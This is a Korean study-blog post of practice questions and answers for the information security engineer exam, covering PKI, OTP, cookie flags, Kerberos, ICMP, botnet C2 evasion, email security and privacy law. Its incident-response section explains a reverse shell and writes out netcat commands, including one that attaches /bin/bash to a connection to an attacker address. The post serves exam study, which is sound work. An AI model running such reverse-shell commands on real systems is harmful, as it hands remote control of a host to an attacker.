[정보보안기사 실기 공부] week 6
틀린 부분이 있다면 언제든지 댓글 남겨주세요!
11.18 (day 36) 정보보안 일반
단답형 1. PKI 관련 용어 설명 중 알맞은 단어 쓰기
(1) ( ) : 개인키 도난, 분실시 악의적인 사용자가 정당한 사용자를 가장하여 발생할 수 있는 피해 방지를 위해 사용.
인증기관은 저장소에 이를 보관하고 모든 신뢰 당사자가 알 수 있도록 해야 함.
(2) ( ) : WAP에서 서버와 클라이언트간 인증을 위해 무선 환경에 적합한 인증서를 발급/관리하는 무선망의 공개키 기반 구조.
(3) ( ) : 인증서를 검증하는 신뢰 당사자의 CRL 전체를 다운로드 하지 않아도 네트워크를 이용해 PKI에서 실시간으로 필요한 인증서의 상태를 확인하기 위한 프로토콜
(4) ( ) : CRL 저장소에 보관되어 있는 PKI정보를 추가/삭제/변경할 수 있는 프로토콜
(5) ( ) : 공개키 기반 구조에서 사용되는 인증서로, ITU-T에서 개발한 형식
답: (1) CRL(인증서 폐기 목록) (2) WPKI(Wireless Public Key Infrastructure) (3) OCSP(Online Certificate Status Protocol) (4) LDAP(Lightweight Directory Access Protocol) (5) X.509
* PKI(Public Key Infrastructure): 사용자 공개키/ID를 안전하게 전달하는 방법, 공개키를 신뢰성 있게 관리하기 위한 수단 제공
* 인증서 검증 문제 해결 방법
- OCSP: 클라이언트가 인증서 검증 작업을 수행하기 어렵기 때문에 별도의 제 3자에게 인증서 검증을 요청하고 그 결과만 클라이언트가 받아 수행함.
- SLC(Short Lived Certificate): WTLS에서 사용되는 방식. 인증서의 유효기간을 기존의 인증서 폐지목록 인증 주기와 비슷하게 하여 클라이언트가 해당 인증서에 대한 인증서 폐기목록 검증작업을 하지 않는 방식. 즉 25/48시간의 짧은 유효 기간을 가지는 인증서로 인증서 취소 사유 발생 시 더 이상 인증서를 발행하지 않아 인증서 폐지 사실을 알리는 것.
서술형 1. ARS, SMS등 추가인증이 필요한 현재의 OTP와 달리, 추가인증이 필요없는 스마트 OTP 인증방식의 동작원리
답: 스마트OTP는 기존 OTP기기 대신 스마트폰과 IC카드를 이용해 인증. 거래중인 은행에서 IC카드( 비밀번호 생성에 필요)를 발급받아 이를 스마트폰(전용앱이 설치되어 있고 NFC활성화 상태)에 접촉하면 자동으로 숫자가 생성되어 입력됨.
장점 - 기존 OTP보다 튼튼하고 저렴해 배터리교체가 필요없고 반영구적으로 사용 가능
단점 - 스마트폰과 시간동기화 문제 취약점 존재. 본인 명의 스마트폰 1대에만 등록이 가능해 분실 및 변경시 새로 등록
* OTP(one time password): 안전한 금융 거래를 위해 매번 새로운 일회용 비밀번호를 자동으로 생성하는 보안매체
법률 1. 개인정보 보호법령 및 하위 고시에 의거해 알맞은 기간 쓰기
(1) 접근권한 부여 및 말소 등을 기록을 최소 ( )간 보관
(2) 개인정보처리자는 개인정보취급자가 개인정보처리시스템에 접속한 기록을 ( )이상 보관 및 관리,
다만 5만명 이상의 정보주체에 관한 개인정보를 처리하거나 고유식별정보 및 민감정보를 처리하는 개인정보처리시스템의 경우는 ( )이상 보관 및 관리
(3) 개인정보처리자는 개인정보의 오남용 , 분식, 도난, 유출, 위조, 변조에 대응하기 위해 개인정보처리시스템의 접속기록을 ( )회 이상 점검
답: (1) 3년 (2) 1년, 2년 (3) 월 1회
* 특히 접속기록에서 개인정보를 다운로드한 것이 발견된 경우, 내부관리 계획으로 정하는 바에 따라 그 사유를 반드시 확인해야 함
11.19 (day 37) 애플리케이션 보안
단답형 2. HTTP cookie 관련 보안 속성 중 set-cookie 응답 헤더에 설정하여 client에서 script를 통한 쿠키 접근 차단 설정
답: HttpOnly
* cookie 전달 시 헤더
- server → web browser : set-cookie
- web browser → server : cookie
* HTTP cookie 관련 보안 속성
- Secure : set-cookie 응답 헤더에 설정하며, HTTPS(SSL/TLS)일 때만 쿠키를 전송해 기밀성 보장
- Expires : 쿠키의 유효기간을 최소한으로 설정해 남은 정보로 인한 노출 방지
서술형 2. 데이터 암호화 방식에 대해 설명
답: 컬럼 암호화 방식 / 블록 암호화 방식으로 나뉨
컬럼 암호화 방식은 table column단위로 진행하는데 API방식, plug-in방식, hybrid방식이 있음.
블록 암호화 방식은 DB나 file단위로 진행하는데 TDE방식, 파일 암호화 방식이 있음.
* API 방식: 응용 프로그램 자체 암호화. 암복호화 모듈이 API형태로 application서버에 설치, application-DB서버간에 암호화된 데이터 전송
* plug-in 방식: DB서버 암호화. 암복호화 모듈이 DB서버에 설치. application-DB서버간에 평문 데이터 전송하며, 응용프로그램 수정은 최소화 할 수 있지만 기존 DB 스키마를 삭제하고 동일한 이름의 View 생성 필요 (성능 저하)
* TDE 방식: DBMS자체 암호화. DB내부에서 데이터 파일 저장시 암호화
* 파일 암호화 방식: 운영체제 암호화. 파일에 대해 직접 암호화 적용 (모든 유형의 파일 가능)
법률 2. 개인정보보호법 중 영상정보처리기기 설치 및 운영 제한 항목에서 안내문에 공고해야하는 항목 4가지
답: ①설치 목적 및 장소, ②촬영 범위 및 시간, ③관리책임자명 연락처, ④그 밖에 대통령령
* 설치가 가능한 경우
①법령에서 구체적으로 허용한 경우 ②범죄 예방 및 수사 ③시설 안전 및 화재 예방 ④교통 단속 ⑤교통 정보의 수집/분석 및 제공
11.20 (day 38) 정보보안 일반
단답형 3. 취약점의 여러가지 요소를 고려하여 공격의 난이도와 피해 규모를 평가하고 점수화하는 보안 취약점 평가 기준
답: CVSS(Common Vulnerability Scoring System)
* CVSS 점수는 취약점에 대한 패치 우선순위를 정하는 기준이 됨.
서술형 3. 커버로스 동작 방식
답: client는 AS(인증 서버)에 암호를 입력하고 인증값을 받음 > 인증값을 티켓발급서버에 제출하고 티켓을 받음 > 받은 티켓으로 서비스 받고자 하는 서버에 접속
* 커버로스 인증 프로토콜을 이용하면 대칭키를 이용하기 때문에 기밀성과 무결성 보장
법률 3. 개인정보를 목적 외에 이용하거나 제 3자에게 제공하는 것은 원칙적으로 금지하지만, 정보주체 또는 제 3자의 이익을 부당하게 침해할 우려가 없는 경우 예외적으로 허용하는 경우 3가지
답: ①정보주체의 별도 동의를 받는 경우 ②다른 법률에 특별한 규정이 있는 경우 ③명백히 정보주체 또는 제 3자의 생명, 신체, 재산의 이익에 필요한 경우
* 개인정보를 목적 외의 용도로 제 3자에게 제공하는 경우, 개인정보를 제공받는 자에게 이용 목적, 이용 방법, 그 밖에 필요한 사항에 대하여 제한 및 개인정보의 안전성 확보를 위한 필요한 조치를 마련하도록 요청하고 개인정보를 제공받는 자는 개인정보 안전성 확보 조치를 이행해야 함
11.21 (day 39) 네트워크 보안
단답형 4. 이것은 세션 식별 정보를 위조하여 정보를 탈취하는 공격으로, 공격자는 정상적인 사용자의 source IP와 Port로 위조하고 sequence number를 예측하려 세션을 탈취
답: TCP session Hijacking
* TCP 연결 설정을 통해 세션 생성 후 상호간 인식을 위해 필요한 요소
- source IP / Port
- destination IP / Port
- Sequence Number / Acknowledgement Number
서술형 4. ICMP 프로토콜에 대해 설명하고 주요 기능 2가지
답: IP 프로토콜이 신뢰할 수 없다는 단점을 보완하기 위해 IP 패킷 전송 중 에러 발생시 원인을 알려주거나 네트워크 상태를 진단해주는 역할.
기능 - Error Reporting Message, Query Message
* 기능의 주요 메시지
- Error Reporting Message: Destination Unreachable (Type 3, 목적지 도달 불가) / Redirection (Type 5, 라우팅 경로 변경으로 새로운 경로 전송), Time exceeded (Type 11, 타임 아웃으로 IP 패킷 폐기)
- Query Message: Echo Request(Type 8) / Echo Reply (Type 0)
법률 4. 빈칸에 알맞은 단어
- [개인정보보호법 시행령 제 35조 개인정보 영향평가의 대상] 대통령령으로 정하는 기준에 해당하는 ( ① )이란 개인정보를 전자적으로 처리할 수 있는 ( ① )로서 다름 각 호의 어느 하나에 해당하는 것을 말함
(1) 구축/운용/변경 하려는 ( ① )로서 ( ② )명 이상의 정보주체에 관한 민감한 정보 또는 ( ③ )의 처리가 수반되는 ( ① )
(2) 구축/운용하고 있는 ( ① )을 해당 공공기관 내부 또는 외부에서 구축/운용하고 있는 다른 ( ① )과 연계하려는 경우로서, 연계 결과 ( ④ )명 이상의 정보주체에 관한 개인정보가 포함되는 ( ① )
(3) 구축/운용/변경하려는 ( ① )로서 ( ⑤ )명 이상의 정보주체에 관한 ( ① )
(4) 개인정보 영향평가를 받은 후에 개인정보 검색체계 등 ( ① )의 운용체계를 변경하려는 경우 그 ( ① ). 이 경우 영향 평가 대상은 변견된 부분으로 한정한다
답: ①개인정보파일 ②5만 ③고유식별정보 ④50만 ⑤100만
11.22 (day 40) 시스템 보안
단답형 5. 프로세스 생성 시 개별 관리정보를 담고 있는 자료구조 테이블을 OS커널이 생성한 것으로 프로세스 상태, 번호(우선순위), 프로그램 카운터(PC), 레지스터, 메모리 정보, 식별자를 포함하고 있는 것은
답: PCB(Process Control Block)
* PCB는 프로세스 종료 시 제거되면 모든 프로세스는 고유한 프로세스 디스트립터(개별 프로세스별로 오픈한 파일 관리 테이블)를 가짐
서술형 5. 클라이언트 요청을 처리해 개별 서비스를 호출하는 (A)는 클라이언트 IP를 확인하여 외부에서 들어오는 접근을 통제하는 (B)와 연동하여 서비스별 호스트를 접근제어하는 데 사용할 수 있다. (B)를 사용할 경우 (A)의 실행 경로에 명시해야 하는 디렉토리 경로와 (A),(B)에 해당하는 단어
답: 디렉토리 경로=/usr/sbin/tcpd , (A)inetd(슈퍼데몬) , (B)TCP wapper
* 데몬=서버 프로세스
* 네트워크 보안 데몬은 stand-alone과 inetd가 있다 (Server Type)
- stand-alone: 개별 서비스 별로 독자적으로 데몬 동작. 속도는 빠르지만 서버 리소스 점유율이 높음
- inetd: 클라이언트 요청을 모두 슈퍼데몬이 처리. inetd 최초 실행시 참조할 정보는 /etc/inetd.conf에 있음
* /etc/inetd.conf 구조 (해당 서비스를 사용하지 않으려면 이 파일에서 그 서비스 부분 주석 후 재가동)
서비스명 | 소켓타입 | 프로토콜 | 플래그 | 사용할 사용자 계정 | 실행경로명 | 실행 인수
ex) FTP | stream | TCP | nowait | root | /usr/sbin/ftpd | in.ftpd -l -a
* /etc/inetd.conf 파일은 /etc/services 파일과 서비스명을 인덱스로 하여 정보를 연계함
- /etc/services: 서비스 포트와 프로토콜 정보 정의 (+포트번호)
법률 5. 정보보호 관리 과정
답: 정보보호 정책 수립 및 범위 설정 → 경영진 책임 및 조직 구성 → 위험 관리 → 정보보호 대책 구현 → 사후 관리
* 정보보호 대책 구현 = 위험을 감소시키기 위한 대책 구현, 여기서 행하는 활동을 control(통제)라고 한다.
* control은 통제 수행 시점, 통제 구현 방식, 통제 구체성에 따라 분류됨
- 통제 수행 시점에 따른 구분
: 예방 통제(사전 식별), 탐지 통제(예방통제를 우회하는 문제 탐지), 교정 통제(탐지 통제를 통해 발견된 문제 복구 및 손실 최소화)
- 통제 구현 방식에 따른 구분
: 관리 통제(직원 통제, 직무 분리 및 순환, 원칙 통제, 변경사항 통제), 운영 통제(문서, HW, SW, 물리적 접근통제)
- 통제 구체성에 따른 구분
: 일반 통제, 응용 통제
11.23 (day 41) 네트워크 보안
단답형 6. 봇넷 공격자가 C2서버와 통신하는 채널을 만들 때 보안 장비에 탐지되는 것을 방지하기 위한 기법 중, 알려진 합법적 도메인의 서브 도메인을 몰래 등록해 C2서버의 도메인으로 사용하는 것은
답: Domain shadowing
* Drive-by-Download 공격에서 유포지에 접근하기 위한 경유도메인을 여러 서브도메인으로 구성함.
* 봇넷 공격자가 C2서버와 통신하는 채널을 만들 때 보안 장비에 탐지되는 것을 방지하기 위한 기법
- Fast Flux: 하나의 C2서버 도메인이 여러 C2 IP를 할당하는 것
- DGA(Domain Generation Algorithm): 새 C2서버 도메인을 동적으로 여러개 생성하여 C2서버 노출을 방지함, 약속된 규칙에 따라 생성될 수 있는 도메인 명 중 하나를 DNS서버에 새로 등록
서술형 6. sniffing 여부를 확인하는 방법 5가지
답: ①ping: 존재하지 않는 MAC주소로 위장한 ping(ICMP request)을 보내 ICMP reply 응답이 오면 sniffing 중
②ARP: 존재하지 않는 MAC주소로 위장한 non-broadcast ARP request를 보내 ARP reply 응답이 오면 sniffing 중
③ARP watch:초기 MAC주소와 IP주소의 매칭값을 저장해두고 ARP 패킷 변화 여부 탐지
(ARP spoofing 공격 시 매칭값과 ARP 패킷이 같지 않을 것)
④DNS: ping sweep(모든 호스트에게 ping보냄)보내고 들어오는 inverse DNS lookup 패킷이 있으면 sniffing 중
⑤Decoy: 가짜 계정을 뿌렸을 때 해당 계정으로 접근하는 시스템 탐지
법률 6. 개인정보보호법 중 [개인정보 처리 단계별 보호조치]에서 개인정보 수집 부분의 정보 주체 동의 시 고지 의무사항 4가지
답: ①개인정보 수집 및 이용 목적 ②개인정보 수집 항목 ③개인정보 보유 및 이용 기간 ④동의를 거부할 권리가 있다는 사실 및 거부에 따른 불이익이 있는 경우 그 내용
* 제 3자 제공시 개인정보를 제공 받는 자 고지
11.24 (day 42) 애플리케이션 보안
단답형 7. DNS서버가 관리하는 domain에 대한 리소스 레코드 정보
답: zone data
* zone data = host정보, name server, mail server 등의 정보 포함
* zone transfer = master name server와 slave name server간의 데이터를 동기화 하는 과정.
* zone transfer에 제한이 없으면 네트워크 및 시스템 자원을 소모시켜 DoS공격에 악용되거나 zone data의 도메인 서버정보 노출이 가능.
> 대응: master DNS server만 있는 경우 zone 전송을 허용하지 않음(allow-transfer:{none}), master/slave 환경에서는 slave만 허용 ({slave IP} = slave)
서술형 7. PGP, S/MIME, PEM의 차이점
답: 모두 이메일 보안 프로토콜.
PGP는 구현이 상대적으로 쉽고 단편화 및 조립 기능이 있음, 분산화된 키 인증으로 로컬 PC에 서버 구축이 가능해 따로 서버를 구매할 필요가 없음
PEM은 프로토콜/운영체제/호스트와 독립적으로 동작, 서버를 구매해 사설 CA를 구축해야 함, 복잡하기 때문에 확장성 떨어지고 구현이 어렵지만 PGP보다 보안성이 강함
S/MIME은 PGP의 낮은 보안성과 PEM의 복잡성을 극복하기 위한 프로토콜, PEM과 같이 서버 구매가 필요
* PGP (Pretty Good Privacy)
: phill zimmermann에 의해 개발. 전자우편을 편지봉투처럼 만든 것으로 전자우편을 암호화 하고 받은 전자우편의 암호를 해석해주는 프로그램.
- 암호화=RSA, IDEA / 키 관리, 메시지인증 및 사용자 인증=RSA / 해시 함수=MD5
- 제공하는 보안 서비스=기밀성, 인증(메시지 인증, 사용자 인증), 압축, 분할, 전자우편 호환
* PEM (Privacy Enhanced mail)
: IETF에 의해 개발. 서버를 구매하여 사설 CA를 구축
- 제공하는 보안 서비스=기밀성, 메시지 무결성, 사용자 인증, 부인방지
* S/MIME (Secure Multi-Pupose Internet Mail Extension)
: RSA data security.Inc에 의해 개발. MIME에 전자서명과 암호화를 더한 형태로 첨부물에 대한 보안이 목적. X.509 지원.
- 암호화=RSA / 암호화 키=DSS, 3DES / 해시함수=SHA-1
- 제공하는 보안 서비스=MIME에 대한 보안, 기밀성, 인증(메시지 인증, 사용자 인증), 메시지 무결성, 송신부인방지(전자서명), 프라이버시와 데이터 보안(암호화 이용)
법률 7. 개인정보보호법 중 개인정보 유출 통지에 포함되어야 하는 내용 5가지
답: ①유출된 개인정보 항목 ②유출된 시점과 경위 ③개인정보 처리자의 대응 조치 및 피해 구제 절차 ④유출로 인해 발생가능한 피해를 최소화하기 위해 정보주체가 할 수 있는 것 ⑤정보주체에게 피해가 발생한 경우 신고할 수 있는 담당부서 및 연락처
* 1천명 이상의 개인정보 유출 시, 보호위원회와 KISA에 신고해야 함
11.25 (day 43) 침해사고 분석대응
단답형 8. 사용자의 정보를 수집해 자주 가는 사이트를 해킹한 후 악성코드 유포지를 redirect시켜 악성 스크립트를 삽입하는 공격
답: 워터링 홀 공격
* 워터링 홀 APT 공격 과정
초기 정찰 - 초기 침입 - 거점 마련 - 권한 상승 - 내부 정찰 - 내부 침투 - 지속성 유지 - 목표 달성
ex) 사이트 해킹 - redirect - backdoor - 관리자 계정 탈취 - 포트포워딩, SSH client, 키로거 - 백도어 시작프로그램 등록 - 지속적인 SSH 터널링을 통해 관리자로 접속하여 정보 탐취, 디스크 파괴형 악성코드 유포
서술형 8. [reverse shell 분석 시나리오] 빈칸에 알맞은 단어
① 웹서버 로그 중 /var/log/( ), /var/log/( ) 파일에 다수의 무작위 대입공격 로그인 시도 발견
실패 기록 중 접속 경로가 원격 터미널인 ( )이나 ( )인 경우 의심
② bash.history 로그 파일로 ( ) 계정의 실행 내역 확인
③ ( ) 명령으로 공격자가 reverse shell을 연결하고 있는 지 확인
답: secure, message, tty1, pts, root, netstat
* netcat을 이용해 reverse shell 설정 과정
① nc -lvp 80 명령: 타겟 웹서버의 nc 프로그램 연결 수락(listener)
② nc 10.10.10.10 80 -e /bin/bash 명령: nc 커넥터로 동작, 공격자에게 접속해 /bin/bash로 실행이미지 교체
③ 타겟 웹서버 nc커넥터가 공격자의 PC의 nc리스너로 접속하여 연결
④ nc커넥터가 자신의 실행이미지를 bash프로세스로 전이한 후 nc리스너와 통신
⑤ 리버스쉘(bash)을 통해 명령어 실행
법률 8. 빈칸에 적절한 단어
개인정보 유효기간제는 ( )동안 서비스를 이용하지 않는 사용자의 개인정보는 ( ) 및 ( ) 저장
정보통신 제공자 개인정보 유효기간제는 만료 ( )전까지 통지해야 함
통지 내용에는
파기시 파기 사실, ( ), 파기되는 개인정보 항목
분리시 분리 보관 사실, ( ), 분리보관되는 개인정보 항목
이 포함되어야 함
답: 1년, 파기, 별도 분리, 30일, 기간 만료일, 기간 만료일